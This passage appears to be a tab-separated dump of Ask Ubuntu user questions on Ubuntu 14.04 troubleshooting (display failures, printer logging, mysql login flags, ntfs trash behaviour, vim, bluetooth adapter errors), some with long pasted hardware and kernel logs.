49.167 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 49.167 ] ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 49.167 ] ( ee ) [ 49.169 ] ( ee ) server terminated with error ( 1 ) . further , the gui of my other os does n't work either . i would really appreciate it someone can advise me on what 's the issue and how can i get it fixed .
472314	generate printer logs	i am using ubuntu 14.04 lts with an epson wf 2540 printer . the printer drivers come from the epson linux download centre and so far have been working ok . the question here for me is how to log every batch of printed jobs to a directory on the side . there is a cutepdf printer on windows that i am aware of which would `` print '' as if a printer to a pdf file . i would need as the printer prints and is complete to log a pdf file of exactly what was printed out so as to reprint if i need to at later stage ..etc . how can this be done automatic under ubuntu . i am guessing cups may be involved ...
472316	screen black ubuntu linux on lenovo ideapad g505 59405547	i bought a new lenovo ideapad g505 59405547 and installed ubuntu linux . everything worked fine , until the screen remained black after booting , on the third day . does anybody know what i could do in order to get it working again ? it would also definitely be helpful to know the source of the problem . thanks , flora
472317	what does mysql -u root -p mean while logging in ?	i am new to using mysql and i do not understand what does -u and -p imply ?
472322	my /etc/apache2/sites-available/default appears blank	hi i am newly switched to ubuntu 14.04 i am installing laravel on my lamp server in tutorial its written to edit this file sudo nano /etc/apache2/sites-available/default but when i tried to open the same file in my nano editor the file appears blank ie . nothing to search as its asked in tutorial , how can i configure my default as suggested in the tutorial .
472325	remove spotify pop-up notification when a song starts	i would like to remove the bubble notifications of spotify that are shown when a new song is being played . this is quite distracting while you are working . i still like the integration within the volume-menu . ubuntu version : 14.04 spotify version : 0.9.10.17.g4129e1c9 thanks
472330	data getting deleted without being moved to trash	i edited fstab to mount a ntfs drive ( of order /dev/sta5 ) on a location of order /media/usrname/thedrive for a systemwide mount . i used the following line uuid=thedrive'suuid /media/username/thedrive ntfs-3g rw , auto , auto , user , fmask=011 , dmask=0000 0 0 the mount was successful . now im facing a problem : whenever i delete any data ( dir as well as file ) from the mounted ntfs partition using nautilus , the data gets directly deleted without being moved to trash . the `` move to trash '' of files in this partition is been replaced by `` delete '' . i tried the same on `` /home '' and `` / '' files and `` move to trash '' is available and even works as normal and data is sent to trash when clicked .
472332	deleting first column with vim	i have a text file . number 1_1 \t number1_2 \t etc number 2_1 \t number2_2 \t etc i want to remove the first column of this file ( corresponding to number1_1 , number2_1 etc , ie the numbers before the first tab for each row ) . i read this post that proposes a solution to delete the first column ( see peter 's answer ) . however , it does n't work for me as the numbers have different sizes and i can not repeat the operation to delete the first column . how can i do then ?
472338	how to install ubuntu on windows 7 using iso with no disk ?	i need to know how i can install ubuntu on windows using the iso file without burning onto a disk . is this possible ?
472347	could not open x display , xdg_runtime_dir error:	output from terminal from where i tried to run nautilus and read an external drive . also , i got a terminal window before logging in that system is running under log graphics mode , i will have to login using terminal or something like that and my login screen never came up so i used alt + ctrl + f2 logged in as root and used service lightdm restart and then tried to back my data so that i could format ubuntu because of so many errors after installing 14.04 i got this error - ( nautilus:3688 ) : gtk-warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files initializing nautilus-dropbox 1.6.2 i/o error : could n't open file '/media/deadman/h laddha/ubuntu-backup2/desktop/5_6sem_be_cse_syllabus_2013-141.pdf ' : permission denied . error loading document : error opening file : permission denied ( nautilus:3688 ) : gnomedesktop-warning ** : unable to create loader for mime type application/pdf : unrecognized image file format ( nautilus:3688 ) : gnomedesktop-warning ** : error creating thumbnail for file : ///media/deadman/h % 20laddha/ubuntu-backup2/desktop/5_6sem_be_cse_syllabus_2013-141.pdf : unrecognized image file format no protocol specified ** ( evince:3922 ) : warning ** : could not open x display no protocol specified error : xdg_runtime_dir not set in the environment . can not parse arguments : can not open display :
472348	wrong vm settings ?	cat /etc/network/interfaces : vm settings -1 : vm settings -2 : virtualbox settings : from the browser of the host , i use : 10.0.0.2 but i get an error . why can not i access apache with these settings ?
472349	bluetooth adapter not found hp 250 g2 ubuntu 14.04 lts	on boot there are two messages - bluetooth : error in firmware loading err = -110 , len = 440 , size = 4076 and bluetooth : loading patch file failed and in the bluetooth settings it says `` no bluetooth adapters found '' i tried this from other 's posts sudo lshw -class network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 07 serial : fc:15 : b4:04:50 : d8 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8106e-1_0.0.1 06/29/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport:3000 ( size=256 ) memory : c2600000-c2600fff memory : c2400000-c2403fff *-network description : wireless interface product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 28 : e3:47:0c:03:8c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-24-generic firmware=n/a ip=192.168.0.5 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:18 memory : c2500000-c257ffff memory : afb00000-afb0ffff lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 07 ) 02:00.0 network controller : qualcomm atheros qca9565 / ar9565 wireless network adapter ( rev 01 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no here are results from lspci etc when bluetooth worked again recently after a reinstall ... again not working now . dee @ ted : ~ $ sudo lshw -class network [ sudo ] password for dee : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 07 serial : fc:15 : b4:04:50 : d8 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8106e-1_0.0.1 06/29/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:3000 ( size=256 ) memory : c2600000-c2600fff memory : c2400000-c2403fff *-network description : wireless interface product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 28 : e3:47:0c:03:8c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-24-generic firmware=n/a ip=192.168.0.5 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:18 memory : c2500000-c257ffff memory : afb00000-afb0ffff dmesg [ 1.340354 ] scsi0 : ahci [ 1.340434 ] scsi1 : ahci [ 1.340499 ] scsi2 : ahci [ 1.340558 ] scsi3 : ahci [ 1.340615 ] scsi4 : ahci [ 1.340669 ] scsi5 : ahci [ 1.340703 ] ata1 : sata max udma/133 abar m2048 @ 0xc2717000 port 0xc2717100 irq 43 [ 1.340705 ] ata2 : dummy [ 1.340708 ] ata3 : sata max udma/133 abar m2048 @ 0xc2717000 port 0xc2717200 irq 43 [ 1.340709 ] ata4 : dummy [ 1.340710 ] ata5 : dummy [ 1.340711 ] ata6 : dummy [ 1.496003 ] usb 1-1 : new high-speed usb device number 2 using ehci-pci [ 1.628521 ] usb 1-1 : new usb device found , idvendor=8087 , idproduct=0024 [ 1.628524 ] usb 1-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.628748 ] hub 1-1:1.0 : usb hub found [ 1.628828 ] hub 1-1:1.0 : 6 ports detected [ 1.660105 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 1.663546 ] ata1.00 : ata-8 : toshiba mq01abf050 , am002c , max udma/100 [ 1.663552 ] ata1.00 : 976773168 sectors , multi 16 : lba48 ncq ( depth 31/32 ) , aa [ 1.668556 ] ata1.00 : configured for udma/100 [ 1.668775 ] scsi 0:0:0:0 : direct-access ata toshiba mq01abf0 am00 pq : 0 ansi : 5 [ 1.668918 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 [ 1.668925 ] sd 0:0:0:0 : [ sda ] 976773168 512-byte logical blocks : ( 500 gb/465 gib ) [ 1.668929 ] sd 0:0:0:0 : [ sda ] 4096-byte physical blocks [ 1.669027 ] sd 0:0:0:0 : [ sda ] write protect is off [ 1.669031 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 1.669111 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 1.740199 ] usb 2-1 : new high-speed usb device number 2 using ehci-pci [ 1.802611 ] sda : sda1 sda2 sda3 [ 1.803233 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 1.872677 ] usb 2-1 : new usb device found , idvendor=8087 , idproduct=0024 [ 1.872694 ] usb 2-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.872926 ] hub 2-1:1.0 : usb hub found [ 1.873051 ] hub 2-1:1.0 : 6 ports detected [ 1.988384 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 1.990373 ] ata3.00 : atapi : hp dvdram gu90n , u900 , max udma/100 [ 1.992501 ] ata3.00 : configured for udma/100 [ 1.996466 ] scsi 2:0:0:0 : cd-rom hp dvdram gu90n u900 pq : 0 ansi : 5 [ 1.999677 ] sr0 : scsi3-mmc drive : 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray [ 1.999680 ] cdrom : uniform cd-rom driver revision : 3.20 [ 1.999831 ] sr 2:0:0:0 : attached scsi cd-rom sr0 [ 1.999989 ] sr 2:0:0:0 : attached scsi generic sg1 type 5 [ 2.040463 ] usb 3-3 : new high-speed usb device number 2 using xhci_hcd [ 2.113889 ] usb 3-3 : new usb device found , idvendor=0bda , idproduct=5776 [ 2.113893 ] usb 3-3 : new usb device strings : mfr=3 , product=1 , serialnumber=2 [ 2.113895 ] usb 3-3 : product : hp truevision hd [ 2.113898 ] usb 3-3 : manufacturer : ddtpn019i5xgz0 [ 2.113899 ] usb 3-3 : serialnumber : 200901010001 [ 2.124496 ] tsc : refined tsc clocksource calibration : 2394.560 mhz [ 2.212507 ] psmouse serio1 : synaptics : touchpad model : 1 , fw : 7.5 , id : 0x1c0b1 , caps : 0xf00133/0x240000/0xa2400 , board id : 2665 , fw id : 1458825 [ 2.248856 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input5 [ 2.284669 ] usb 3-4 : new full-speed usb device number 3 using xhci_hcd [ 2.301993 ] usb 3-4 : new usb device found , idvendor=0cf3 , idproduct=3121 [ 2.301996 ] usb 3-4 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 2.826375 ] ext4-fs ( sda2 ) : info : recovery required on readonly filesystem [ 2.826378 ] ext4-fs ( sda2 ) : write access will be enabled during recovery [ 3.125430 ] switched to clocksource tsc [ 3.159141 ] ext4-fs ( sda2 ) : orphan cleanup on readonly fs [ 3.159285 ] ext4-fs ( sda2 ) : 5 orphan inodes deleted [ 3.159287 ] ext4-fs ( sda2 ) : recovery complete [ 3.339753 ] ext4-fs ( sda2 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 3.782520 ] random : nonblocking pool is initialized [ 12.226764 ] adding 4083708k swap on /dev/sda3 . priority : -1 extents:1 across:4083708k fs [ 12.353946 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 12.391756 ] systemd-udevd [ 307 ] : starting version 204 [ 12.535266 ] lp : driver loaded but no devices found [ 12.550689 ] ppdev : user-space parallel port driver [ 12.560025 ] wmi : mapper loaded [ 12.571573 ] [ drm ] initialized drm 1.1.0 20060810 [ 12.573796 ] mei_me 0000:00:16.0 : irq 44 for msi/msi-x [ 12.589978 ] [ drm ] memory usable by graphics device = 2048m [ 12.589983 ] checking generic ( b0000000 408000 ) vs hw ( b0000000 10000000 ) [ 12.589985 ] fb : conflicting fb hw usage inteldrmfb vs efi vga - removing generic driver [ 12.590010 ] console : switching to colour dummy device 80x25 [ 12.595850 ] bluetooth : core ver 2.17 [ 12.595872 ] net : registered protocol family 31 [ 12.595874 ] bluetooth : hci device and connection manager initialized [ 12.595882 ] bluetooth : hci socket layer initialized [ 12.595885 ] bluetooth : l2cap socket layer initialized [ 12.595889 ] bluetooth : sco socket layer initialized [ 12.597851 ] usbcore : registered new interface driver btusb [ 12.608654 ] cfg80211 : calling crda to update world regulatory domain [ 12.648717 ] ath : phy0 : wb335 1-ant card detected [ 12.648722 ] ath : phy0 : set bt/wlan rx diversity capability [ 12.657771 ] ath : phy0 : enable lna combining [ 12.657860 ] i915 0000:00:02.0 : irq 45 for msi/msi-x [ 12.657876 ] [ drm ] supports vblank timestamp caching rev 2 ( 21.10.2013 ) . [ 12.657878 ] [ drm ] driver supports precise vblank timestamp query . [ 12.658016 ] vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+mem , decodes=io+mem : owns=io+mem [ 12.659582 ] ath : phy0 : aspm enabled : 0x43 [ 12.659586 ] ath : eeprom regdomain : 0x6a [ 12.659587 ] ath : eeprom indicates we should expect a direct regpair map [ 12.659590 ] ath : country alpha2 being used : 00 [ 12.659591 ] ath : regpair used : 0x6a [ 12.669305 ] ieee80211 phy0 : selected rate control algorithm 'minstrel_ht ' [ 12.670529 ] ieee80211 phy0 : atheros ar9565 rev:1 mem=0xffffc90010800000 , irq=18 [ 12.705099 ] kvm : disabled by bios [ 12.708927 ] fbcon : inteldrmfb ( fb0 ) is primary device [ 12.863649 ] intel_rapl : domain uncore energy ctr 231228:231228 not working , skip [ 12.879766 ] usbcore : registered new interface driver ath3k [ 12.879795 ] usb 3-4 : usb disconnect , device number 3 [ 12.884698 ] input : hp wmi hotkeys as /devices/virtual/input/input6 [ 12.935958 ] type=1400 audit ( 1401132430.151:2 ) : apparmor= '' status '' operation= '' profile_load '' profile= '' unconfined '' name= '' /sbin/dhclient '' pid=389 comm= '' apparmor_parser '' [ 12.935962 ] type=1400 audit ( 1401132430.151:3 ) : apparmor= '' status '' operation= '' profile_load '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=389 comm= '' apparmor_parser '' [ 12.935965 ] type=1400 audit ( 1401132430.151:4 ) : apparmor= '' status '' operation= '' profile_load '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=389 comm= '' apparmor_parser '' [ 12.936370 ] type=1400 audit ( 1401132430.151:5 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /sbin/dhclient '' pid=366 comm= '' apparmor_parser '' [ 12.936377 ] type=1400 audit ( 1401132430.151:6 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=366 comm= '' apparmor_parser '' [ 12.936381 ] type=1400 audit ( 1401132430.151:7 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=366 comm= '' apparmor_parser '' [ 12.936388 ] type=1400 audit ( 1401132430.151:8 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=389 comm= '' apparmor_parser '' [ 12.936391 ] type=1400 audit ( 1401132430.151:9 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=389 comm= '' apparmor_parser '' [ 12.936603 ] type=1400 audit ( 1401132430.151:10 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=389 comm= '' apparmor_parser '' [ 12.936901 ] type=1400 audit ( 1401132430.151:11 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=366 comm= '' apparmor_parser '' [ 13.003378 ] linux video capture interface : v2.00 [ 13.011016 ] uvcvideo : found uvc 1.00 device hp truevision hd ( 0bda:5776 ) [ 13.016106 ] input : hp truevision hd as /devices/pci0000:00/0000:00:14.0/usb3/3-3/3-3:1.0/input/input7 [ 13.016243 ] usbcore : registered new interface driver uvcvideo [ 13.016244 ] usb video class driver ( 1.1.1 ) [ 13.082190 ] cfg80211 : world regulatory domain updated : [ 13.082191 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 13.082193 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 13.082194 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 13.082195 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 13.082196 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 13.082198 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 13.149846 ] usb 3-4 : new full-speed usb device number 4 using xhci_hcd [ 13.498188 ] console : switching to colour frame buffer device 170x48 [ 13.500727 ] i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device [ 13.500728 ] i915 0000:00:02.0 : registered panic notifier [ 13.515337 ] acpi : video device [ gfx0 ] ( multi-head : yes rom : no post : no ) [ 13.516546 ] acpi device:40 : registered as cooling_device5 [ 13.517720 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:00/input/input8 [ 13.518867 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 13.519112 ] acpi warning : 0x0000000000000428-0x000000000000042f systemio conflicts with region \pmio 1 ( 20131115/utaddress-251 ) [ 13.519119 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 13.519124 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \gpio 1 ( 20131115/utaddress-251 ) [ 13.519128 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 13.519130 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \gpio 1 ( 20131115/utaddress-251 ) [ 13.519134 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 13.519136 ] lpc_ich : resource conflict ( s ) found affecting gpio_ich [ 13.519343 ] snd_hda_intel 0000:00:1b.0 : irq 46 for msi/msi-x [ 13.538216 ] sku : nid=0x1d sku_cfg=0x40f41905 [ 13.538220 ] sku : port_connectivity=0x1 [ 13.538221 ] sku : enable_pcbeep=0x1 [ 13.538223 ] sku : check_sum=0x00000004 [ 13.538224 ] sku : customization=0x00000019 [ 13.538225 ] sku : external_amp=0x0 [ 13.538226 ] sku : platform_type=0x1 [ 13.538227 ] sku : swap=0x0 [ 13.538229 ] sku : override=0x1 [ 13.538442 ] autoconfig : line_outs=1 ( 0x14/0x0/0x0/0x0/0x0 ) type : speaker [ 13.538445 ] speaker_outs=0 ( 0x0/0x0/0x0/0x0/0x0 ) [ 13.538447 ] hp_outs=1 ( 0x21/0x0/0x0/0x0/0x0 ) [ 13.538449 ] mono : mono_out=0x0 [ 13.538450 ] inputs : [ 13.538452 ] mic=0x19 [ 13.538454 ] internal mic=0x12 [ 13.538456 ] realtek : no valid ssid , checking pincfg 0x40f41905 for nid 0x1d [ 13.538458 ] realtek : enabling init asm_id=0x1905 codec_id=10ec0282 [ 13.551178 ] input : hda intel pch hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input11 [ 13.551285 ] input : hda intel pch headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 13.551376 ] input : hda intel pch mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 13.838794 ] [ drm ] enabling rc6 states : rc6 on , rc6p on , rc6pp off [ 13.953842 ] ext4-fs ( sda2 ) : re-mounted . opts : errors=remount-ro [ 14.520813 ] init : failsafe main process ( 637 ) killed by term signal [ 14.945214 ] bluetooth : rfcomm tty layer initialized [ 14.945227 ] bluetooth : rfcomm socket layer initialized [ 14.945232 ] bluetooth : rfcomm ver 1.11 [ 14.947897 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 14.947900 ] bluetooth : bnep filters : protocol multicast [ 14.947910 ] bluetooth : bnep socket layer initialized [ 15.551606 ] init : avahi-cups-reload main process ( 776 ) terminated with status 1 [ 16.738088 ] r8169 0000:01:00.0 eth0 : link down [ 16.738138 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 16.738449 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 16.752740 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 16.759687 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 18.154149 ] xhci_hcd 0000:00:14.0 : timeout while waiting for address device command [ 18.154180 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- [ 18.154189 ] warning : cpu : 3 pid : 0 at /build/buildd/linux-3.13.0/drivers/usb/host/xhci-ring.c:1572 handle_cmd_completion+0xe2a/0xe40 ( ) [ 18.154190 ] modules linked in : bnep rfcomm nls_iso8859_1 snd_hda_codec_hdmi snd_hda_codec_realtek uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hp_wmi sparse_keymap snd_hda_intel snd_hda_codec snd_hwdep snd_pcm intel_rapl x86_pkg_temp_thermal intel_powerclamp coretemp kvm snd_page_alloc crct10dif_pclmul snd_seq_midi snd_seq_midi_event crc32_pclmul snd_rawmidi ghash_clmulni_intel cryptd snd_seq arc4 joydev serio_raw ath9k ath9k_common ath9k_hw ath snd_seq_device snd_timer rtsx_pci_ms mac80211 lpc_ich snd memstick cfg80211 ath3k btusb bluetooth soundcore i915 drm_kms_helper mei_me mei drm i2c_algo_bit wmi parport_pc ppdev video lp parport mac_hid rtsx_pci_sdmmc psmouse ahci r8169 libahci rtsx_pci mii [ 18.154235 ] cpu : 3 pid : 0 comm : swapper/3 not tainted 3.13.0-24-generic # 47-ubuntu [ 18.154237 ] hardware name : hewlett-packard hp 250 g2 notebook pc/218f , bios f.0c 01/08/2013 [ 18.154239 ] 0000000000000009 ffff88014f2c3da8 ffffffff81715ac4 0000000000000000 [ 18.154242 ] ffff88014f2c3de0 ffffffff810676bd ffff880145297430 0000000000000003 [ 18.154244 ] ffff8801452970e0 00000001452970e0 ffff880145188000 ffff88014f2c3df0 [ 18.154247 ] call trace : 0 [ 18.154280 ] [ < ffffffff810bf87d > ] handle_irq_event+0x3d/0x60 [ 18.154283 ] [ < ffffffff810c2257 > ] handle_edge_irq+0x77/0x130 [ 18.154286 ] [ < ffffffff81015cde > ] handle_irq+0x1e/0x30 [ 18.154290 ] [ < ffffffff817287cd > ] do_irq+0x4d/0xc0 [ 18.154293 ] [ < ffffffff8171df6d > ] common_interrupt+0x6d/0x6d [ 18.154294 ] < eoi > [ < ffffffff815c95e2 > ] ? cpuidle_enter_state+0x52/0xc0 [ 18.154300 ] [ < ffffffff815c9709 > ] cpuidle_idle_call+0xb9/0x1f0 [ 18.154303 ] [ < ffffffff8101ceae > ] arch_cpu_idle+0xe/0x30 [ 18.154306 ] [ < ffffffff810beb85 > ] cpu_startup_entry+0xc5/0x290 [ 18.154309 ] [ < ffffffff81040fc8 > ] start_secondary+0x218/0x2c0 [ 18.154311 ] -- - [ end trace a7a9af493000c6d0 ] -- - [ 18.235052 ] init : plymouth-upstart-bridge main process ended , respawning [ 18.244533 ] init : plymouth-upstart-bridge main process ended , respawning [ 18.358357 ] usb 3-4 : device not responding to set address . [ 18.559641 ] wlan0 : authenticate with 20:0c : c8:8b:26:10 [ 18.562445 ] usb 3-4 : device not accepting address 4 , error -71 [ 18.580402 ] wlan0 : send auth to 20:0c : c8:8b:26:10 ( try 1/3 ) [ 18.582645 ] wlan0 : authenticated [ 18.586524 ] wlan0 : associate with 20:0c : c8:8b:26:10 ( try 1/3 ) [ 18.591115 ] wlan0 : rx assocresp from 20:0c : c8:8b:26:10 ( capab=0x411 status=0 aid=2 ) [ 18.591180 ] wlan0 : associated [ 18.591194 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 18.591452 ] cfg80211 : calling crda for country : gb [ 18.594156 ] ath : eeprom regdomain : 0x833a [ 18.594160 ] ath : eeprom indicates we should expect a country code [ 18.594161 ] ath : doing eeprom country- > regdmn map search [ 18.594163 ] ath : country maps to regdmn code : 0x37 [ 18.594164 ] ath : country alpha2 being used : gb [ 18.594165 ] ath : regpair used : 0x37 [ 18.594166 ] ath : regdomain 0x833a dynamically updated by country ie [ 18.594187 ] cfg80211 : regulatory domain changed to country : gb [ 18.594188 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 18.594190 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 18.594191 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 18.594192 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 18.594194 ] cfg80211 : ( 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a , 2700 mbm ) [ 18.594195 ] cfg80211 : ( 57240000 khz - 65880000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 18.629528 ] wlan0 : deauthenticating from 20:0c : c8:8b:26:10 by local choice ( reason=2 ) [ 18.638171 ] cfg80211 : calling crda to update world regulatory domain [ 18.638222 ] wlan0 : authenticate with 20:0c : c8:8b:26:10 [ 18.653708 ] wlan0 : send auth to 20:0c : c8:8b:26:10 ( try 1/3 ) [ 18.653873 ] cfg80211 : world regulatory domain updated : [ 18.653877 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 18.653880 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 18.653883 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 18.653885 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 18.653886 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 18.653888 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 18.655987 ] wlan0 : authenticated [ 18.658557 ] wlan0 : associate with 20:0c : c8:8b:26:10 ( try 1/3 ) [ 18.667784 ] wlan0 : rx assocresp from 20:0c : c8:8b:26:10 ( capab=0x411 status=0 aid=2 ) [ 18.667834 ] wlan0 : associated [ 18.667887 ] cfg80211 : calling crda for country : gb [ 18.670393 ] ath : eeprom regdomain : 0x833a [ 18.670396 ] ath : eeprom indicates we should expect a country code [ 18.670398 ] ath : doing eeprom country- > regdmn map search [ 18.670399 ] ath : country maps to regdmn code : 0x37 [ 18.670400 ] ath : country alpha2 being used : gb [ 18.670401 ] ath : regpair used : 0x37 [ 18.670403 ] ath : regdomain 0x833a dynamically updated by country ie [ 18.670424 ] cfg80211 : regulatory domain changed to country : gb [ 18.670425 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 18.670426 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 18.670427 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 18.670429 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 18.670430 ] cfg80211 : ( 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a , 2700 mbm ) [ 18.670431 ] cfg80211 : ( 57240000 khz - 65880000 